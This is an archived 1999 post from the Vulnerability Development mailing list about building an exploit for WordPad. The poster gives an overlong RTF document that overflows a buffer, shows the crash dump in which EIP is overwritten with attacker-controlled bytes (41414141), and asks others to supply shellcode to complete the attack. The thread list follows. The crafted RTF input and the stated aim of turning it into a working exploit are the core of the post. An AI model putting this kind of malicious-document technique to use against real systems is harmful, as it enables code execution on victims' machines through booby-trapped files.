Vulnerability Development mailing list archives
Re: development of wordpad exploit
From: jepaulson () BANENG COM (Jason Paulson)
Date: Fri, 19 Nov 1999 10:56:29 -0600
I am also interested in learning. and I have a small donation to make. I don't know the opcodes for an intel processor but I have control of the stack. So if some Assembly guru will fill in the empty space with some interesting opcodes I think we are in business. the following contents of an rtf document: (probably wraped, should all be one line) {\rtf\AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABCDEFGHIJKLMNOPQRSTUVWXYZ0AAB BCCDDEEFFGGHHIIJJKKLLMMNNOOPPQQRRSSTTUUVVWWXXYYZZAAABBBCCCDDDEEEFFFGGGHHHIII JJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZAAAABBBBCCCCDDDDEEEEFFFFG GGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOPPPPQQQQRRRRSSSSTTTTUUUUVVVVWWWWXXXXYYYYZ ZZZAAAAABBBBBCCCCCDDDDDEEEEEFFFFFGGGGGHHHHHIIIIIJJJJJKKKKKLLLLLMMMMMNNNNNOOO OOPPPPPQQQQQRRRRRSSSSSTTTTTUUUUUVVVVVWWWWWXXXXXYYYYYZZZZZ} will cause the following the following dump: WORDPAD caused an invalid page fault in module <unknown> at 00de:41414141. Registers: EAX=00000102 CS=017f EIP=41414141 EFLGS=00010212 EBX=0056e364 SS=0187 ESP=0056e324 EBP=00000409 ECX=0056e364 DS=0187 ESI=0056e364 FS=57a7 EDX=fffffff3 ES=0187 EDI=0056e418 GS=609e Bytes at CS:EIP: Stack dump: 44434241 48474645 4c4b4a49 504f4e4d 54535251 58575655 00005a59 00500f1c 00000000 00000000 00000000 00500e90 480268ad 00500f40 00500e90 80000002 notice that we control EIP (41414141, all As) and the the first part of the stack is also under our control (44434241 48474645 = DCBA HGFE) this is reversed because of the way the i386 architecture stores memory pointers. Cheers, Jason
Current thread:
- development of wordpad exploit Linux Users Strike Today (Nov 18)
- RES: development of wordpad exploit Marlon Jabbur (Nov 19)
- Re: development of wordpad exploit Gerardo Richarte (Nov 19)
- Re: development of wordpad exploit Gerardo Richarte (Nov 19)
- <Possible follow-ups>
- Re: development of wordpad exploit Larry W. Cashdollar (Nov 19)
- Re: development of wordpad exploit Taneli Huuskonen (Nov 19)
- Re: development of wordpad exploit Jason Paulson (Nov 19)
- Re: development of wordpad exploit Riley, Steven (Nov 19)
- Re: development of wordpad exploit Thomas Dullien (Nov 19)
- Re: development of wordpad exploit Harlan Carvey (Nov 19)
- Re: development of wordpad exploit Vanna P. Rella (Nov 19)
- Re: development of wordpad exploit Witold Chrabaszcz (Nov 19)
- Re: development of wordpad exploit Blue Boar (Nov 19)
- Re: development of wordpad exploit Rodrick Brown (Nov 19)
- [Fwd: INZIDER!] Blue Boar (Nov 19)
- Re: development of wordpad exploit Seth R Arnold (Nov 20)
- Re: development of wordpad exploit Witold Chrabaszcz (Nov 19)
- Re: development of wordpad exploit Aubrey Smith (Nov 20)